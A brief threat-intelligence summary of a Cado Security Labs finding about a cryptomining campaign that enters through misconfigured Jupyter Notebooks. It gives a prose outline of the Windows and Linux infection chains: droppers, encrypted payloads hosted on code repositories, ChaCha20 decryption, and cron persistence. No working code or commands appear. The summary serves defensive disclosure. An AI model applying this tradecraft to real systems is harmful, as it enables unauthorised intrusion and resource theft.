Cado Security Labs has uncovered a cryptomining campaign exploiting misconfigured Jupyter Notebooks, affecting both Windows and Linux environments. The attackers use Jupyter as an entry point to deploy a cryptominer through a series of evasive techniques. On Windows, the attack chain begins with retrieving an MSI file that executes a binary named Binary.freedllBinary. This binary loads a secondary payload (java.exe), which masquerades as a Java Platform binary while retrieving and decrypting an additional payload (x2.dat) from repositories like GitHub, Launchpad, and Gitee. The final stage delivers a cryptominer that mines multiple cryptocurrencies, including Monero and Sumokoin. If the MSI execution fails, the attack falls back on a JavaScript backdoor (0217.js), which fetches Linux ELF binaries and installs them using cron jobs.
The Linux variant follows a similar approach but uses bash scripts (0217.js) to deploy 0218.elf and 0218.full. The binaries retrieve encrypted mining payloads (lx.dat), decrypt them using ChaCha20, and execute the miner. The campaign also includes a PHP-based infection mechanism (1.php), which delivers platform-specific cryptomining binaries depending on the operating system. The attackers leverage cloud-based misconfigurations to infiltrate systems, host payloads on repositories like GitHub and Gitee, and set up persistence through cron jobs. Similar tactics have been seen in previous campaigns targeting Ivanti Connect Secure and Korean web servers.